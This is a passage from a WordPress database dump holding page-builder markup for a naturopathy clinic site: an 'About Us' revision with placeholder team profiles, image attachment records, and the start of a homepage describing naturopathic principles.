{\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_bg_type\":\"image\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"bottom\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"ele_padding\":\"9em,0em,9em,0em\",\"ele_bg_img\":\"6\",\"ele_margin\":\"4em,0em,0em,0em\",\"ele_padding_mobile\":\"3em,0em,3em,0em\",\"ele_margin_mobile\":\"3em,0em,3em,0em\",\"ele_padding_tablet\":\"4em,0em,4em,0em\",\"ele_margin_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"a8p6079\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"3\",\"pagelayer-id\":\"9yu7254\"} -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"s7g7021\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"pagelayer-id\":\"5hw2741\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"heading_typo_mobile\":\",25,,,,,Solid,1,,,\",\"text\":\"\\u003ch3\\u003eTRAVEL FAR ENOUGH, YOU MEET YOURSELF\\u003c\\/h3\\u003e\",\"color\":\"#ffffffff\",\"pagelayer-id\":\"i771446\"} --><h3>TRAVEL FAR ENOUGH, YOU MEET YOURSELF</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_text {\"ele_padding\":\"0%,15%,0%,15%\",\"ele_padding_mobile\":\"1px,1px,1px,1px\",\"animation\":\"\",\"animation_delay\":\"700\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003e\\u003cspan\\u003eThis is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit.\\u003c\\/span\\u003e\\u003c\\/p\\u003e\",\"pagelayer-id\":\"zai3572\"} --><p style=\"text-align: center\"><span>This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor, nisi elit consequat ipsum, nec sagittis sem nibh id elit.</span></p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Subscribe\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"0,0,0,0\",\"btn_bg_color\":\"#efba6cff\",\"btn_color\":\"#ffffff\",\"btn_bg_color_hover\":\"#fefefeff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#efba6cff\",\"animation\":\"\",\"animation_delay\":\"800\",\"pagelayer-id\":\"urd8148\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"6u68858\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"n3o5359\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eAmazing Staff\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"ia01904\"} --><h6>Amazing Staff</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eMeet Our Team\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"i151160\"} --><h5>Meet Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eOur Team\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"gk56279\"} --><h2>Our Team</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"azt1744\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_margin\":\"0em,0em,0em,0em\",\"pagelayer-id\":\"lyv7327\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"wls6867\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Susan Day\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eManager\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"8ms7248\"} --><h5>Manager</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"ygb9138\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"wow922\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"lfg2362\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"zqg3285\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"af46547\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"1d15001\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"James Duncan\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eLeader\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"bg04263\"} --><h5>Leader</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"bb15453\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"ofa8491\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"ryu4544\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"ywe7457\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"qc22130\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"700\",\"pagelayer-id\":\"6r87422\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Lori Harvey\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eSupervisor\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"yyu124\"} --><h5>Supervisor</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"mzm7746\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"qzi6431\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"dop7386\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"huj3423\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"1s04265\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"1\",\"ele_margin\":\"3em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"800\",\"pagelayer-id\":\"ynr8569\"} -->\n<!-- wp:pagelayer/pl_service {\"service_image\":\"4\",\"service_image_size\":\"custom\",\"service_alignment\":\"top\",\"service_vertical_alignment\":\"top\",\"img_bor_state\":\"normal\",\"img_filter\":\"0,100,100,0,0,100,100\",\"img_transition\":\"400\",\"img_filter_hover\":\"0,100,100,0,0,100,100\",\"service_heading\":\"Ralph Fields\",\"heading_alignment\":\"center\",\"service_title_spacing\":\"20,0,10,0\",\"heading_state\":\"normal\",\"service_heading_color\":\"#101112ff\",\"service_heading_typo\":\",18,,600,,,Solid,,Uppercase,,\",\"heading_transition\":\"400\",\"service_text_alignment\":\"center\",\"service_btn_hover_delay\":\"400\",\"service_content_spacing\":\"0,15,50,15\",\"service_image_custom_size\":\"120\",\"service_img_alignment\":\"center\",\"service_image_spacing\":\"0,0,0,0\",\"img_border_type\":\"solid\",\"img_border_color\":\"#dfdfdfff\",\"img_border_radius\":\"100%,100%,100%,100%\",\"border_type\":\"solid\",\"border_width\":\"1px,1px,1px,1px\",\"border_color\":\"#5b5959ff\",\"img_border_width\":\"1,1,1,1\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\nmargin-top: -55px;\\n}\",\"ele_padding\":\"0px,0px,40px,0px\",\"service_text\":\"\\u003ch5\\u003eFounder\\u003c\\/h5\\u003e\\n\\u003cp\\u003eAl alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"dcz9820\"} --><h5>Founder</h5>\n<p>Al alit emnos lnipedit ius, vel et hinc agam fabulas. Ut audiam invenire iracundia vim. An eam dico similique, ut sint posse sit.</p><!-- /wp:pagelayer/pl_service -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"0\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#5c5858ff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"bg_shape\":\"pagelayer-social-shape-square\",\"bg_size\":\"7\",\"ele_margin\":\"-80px,0px,0px,0px\",\"ele_css\":\"{{element}} .pagelayer-service-image{\\ntop: 58px !important;\\nposition: relative;\\n}\",\"icon_bg_color\":\"#00ccff00\",\"icon_bg_color_hover\":\"#efba6cff\",\"icon_border_type\":\"solid\",\"icon_border_color\":\"#3b3b3e9e\",\"icon_border_width\":\"1,1,1,1\",\"social_hover\":\"hover\",\"pagelayer-id\":\"l8u11\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"pagelayer-id\":\"xgn7906\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"pagelayer-id\":\"67x129\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"pagelayer-id\":\"qbv1467\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"pagelayer-id\":\"cks8217\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_type\":\"color\",\"ele_bg_color\":\"#efba6cff\",\"ele_padding\":\"1em,0em,1em,0em\",\"content_pos\":\"center\",\"pagelayer-id\":\"ujt2667\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"9\",\"content_pos\":\"center\",\"pagelayer-id\":\"hfe1794\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"heading_typo_mobile\":\",20,,,,,Solid,,,,\",\"text\":\"\\u003ch4\\u003eHow Beautiful Is To Do Nothing And Then Rest Afterwards And Then Rest.\\u003c\\/h4\\u003e\",\"pagelayer-id\":\"9dk4258\"} --><h4>How Beautiful Is To Do Nothing And Then Rest Afterwards And Then Rest.</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"3\",\"pagelayer-id\":\"bu82568\"} -->\n<!-- wp:pagelayer/pl_btn {\"text\":\"Subscribe\",\"align\":\"center\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"btn_border_type\":\"solid\",\"btn_border_color\":\"\",\"btn_border_radius\":\"0,0,0,0\",\"btn_border_width\":\"2,2,2,2\",\"btn_bg_color\":\"\",\"btn_color\":\"#ffffff\",\"btn_bg_color_hover\":\"#ffffffff\",\"btn_typo\":\",,,,,,Solid,,Uppercase,,\",\"btn_hover\":\"hover\",\"btn_color_hover\":\"#efba6cff\",\"btn_bor_hover\":\"hover\",\"btn_border_type_hover\":\"solid\",\"btn_border_color_hover\":\"#fefefeff\",\"btn_border_width_hover\":\"2,2,2,2\",\"align_tablet\":\"left\",\"align_mobile\":\"left\",\"pagelayer-id\":\"kbi5275\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->[/et_pb_text][/et_pb_column]\n [/et_pb_row]\n [/et_pb_section]','About Us','','inherit','closed','closed','','27-revision-v1','','','2021-05-25 21:11:45','2021-05-25 13:11:45','',27,'https://verde.desidrivers.com.au/?p=147',0,'revision','',0),(144,1,'2021-05-25 20:57:03','2021-05-25 12:57:03','','1-01 (large)','','inherit','open','closed','','1-01-large','','','2021-05-25 20:57:03','2021-05-25 12:57:03','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-large.png',0,'attachment','image/png',0),(145,1,'2021-05-25 21:03:34','2021-05-25 13:03:34','','2-01 (large)','','inherit','open','closed','','2-01-large','','','2021-05-25 21:03:34','2021-05-25 13:03:34','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01-large.png',0,'attachment','image/png',0),(186,1,'2021-05-26 20:07:07','2021-05-26 12:07:07','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01-large.png\" title_text=\"2-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" 